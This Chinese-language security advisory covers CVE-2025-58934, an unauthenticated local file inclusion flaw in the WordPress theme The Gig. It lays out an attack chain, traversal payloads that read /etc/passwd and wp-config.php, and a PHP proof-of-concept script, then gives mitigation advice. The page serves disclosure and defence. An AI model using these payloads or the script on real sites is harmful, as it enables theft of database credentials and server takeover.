CVE-2025-58934 WordPress The Gig主题本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-58934

漏洞类型

本地文件包含(LFI)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress The Gig主题 (axiomthemes)

漏洞概述

CVE-2025-58934是WordPress中The Gig主题中的一个高危安全漏洞，CVSS评分8.1。该漏洞属于PHP本地文件包含(Local File Inclusion, LFI)类型，存在于axiomthemes开发的The Gig主题1.18.0及以下版本中。漏洞源于PHP程序对文件名参数缺乏适当的控制，允许攻击者通过构造恶意请求包含服务器上的任意本地文件。由于无需认证即可利用此漏洞，攻击者可以通过精心构造的HTTP请求读取服务器敏感文件，如配置文件(/etc/passwd)、WordPress配置文件(wp-config.php)等，从而获取数据库凭证、API密钥等敏感信息。进一步利用可能导致远程代码执行，对网站安全性造成严重威胁。此漏洞由Patchstack安全团队于2025年12月18日披露，建议用户立即采取修复措施。

技术细节

该漏洞存在于The Gig主题的PHP文件中，由于对include/require语句的文件名参数缺少严格的输入验证，攻击者可以通过URL参数控制被包含的文件路径。在WordPress主题中，通常通过GET或POST请求参数传递文件路径，然后在PHP代码中使用include()或require()函数动态包含文件。攻击者可以利用路径遍历技术(如使用../)来跳出主题目录，访问服务器上的任意文件。例如，通过构造类似?file=../../../../etc/passwd的请求，攻击者可以读取系统敏感文件。成功的文件包含可能导致：1)敏感信息泄露(数据库凭证、API密钥等);2)如果服务器配置允许远程URL包含，可能导致远程代码执行;3)利用日志文件注入PHP代码实现RCE。该漏洞影响The Gig主题从初始版本到1.18.0的所有版本。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress The Gig主题版本(<=1.18.0)

STEP 2

步骤2

攻击者分析主题代码，找到存在LFI漏洞的文件和参数(通常为file、page等参数)

STEP 3

步骤3

攻击者构造恶意请求，利用路径遍历(../../)包含服务器敏感文件，如/etc/passwd

STEP 4

步骤4

通过读取wp-config.php获取数据库凭证、WordPress盐值等敏感信息

STEP 5

步骤5

如果目标配置允许远程URL包含，攻击者可包含托管恶意PHP代码的远程文件实现RCE

STEP 6

步骤6

利用日志文件注入或上传图片马等方式，在服务器上执行任意代码，完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-58934 PoC - WordPress The Gig Theme Local File Inclusion
 * Target: axiomthemes The Gig theme <= 1.18.0
 * Vulnerability: LFI via unvalidated file parameter
 * Author: Security Research Team
 */

$target = 'http://target-site.com/wp-content/themes/thegig/';
$target_path = $argv[1] ?? '/etc/passwd';

echo "[*] CVE-2025-58934 LFI PoC\n";
echo "[*] Target: {$target}\n";
echo "[*] Reading file: {$target_path}\n\n";

// Try to include sensitive files
$vulnerable_param = 'file'; // Common parameter name, adjust based on target
$payload = '../../../../../../..' . $target_path;

$url = $target . '?' . $vulnerable_param . '=' . urlencode($payload);
echo "[*] Request URL: {$url}\n\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[*] HTTP Status: {$http_code}\n";
echo "[*] Response:\n";
echo "---\n";
echo $response;
echo "\n---\n";

// Common sensitive files to check
echo "\n[*] Suggested files to read:\n";
echo "- /etc/passwd (system users)\n";
echo "- wp-config.php (WordPress config)\n";
echo "- ../wp-config.php (alternative path)\n";
echo "- /var/www/html/wp-config.php (full path)\n";
?>

影响范围

The Gig主题 <= 1.18.0

防御指南

临时缓解措施

由于该漏洞无需认证即可利用，在等待官方修复期间，建议立即采取以下临时缓解措施：1)临时禁用或替换The Gig主题，使用其他安全的WordPress主题;2)在Web服务器配置中添加规则，拦截包含../或文件遍历特征的请求;3)限制PHP的allow_url_fopen和allow_url_include功能;4)启用mod_security或使用云WAF服务过滤恶意请求;5)定期监控网站日志，排查异常的文件包含请求;6)对wp-config.php等敏感文件设置严格的文件权限(444)，防止通过LFI读取;7)考虑使用WordPress安全插件如Wordfence进行实时防护。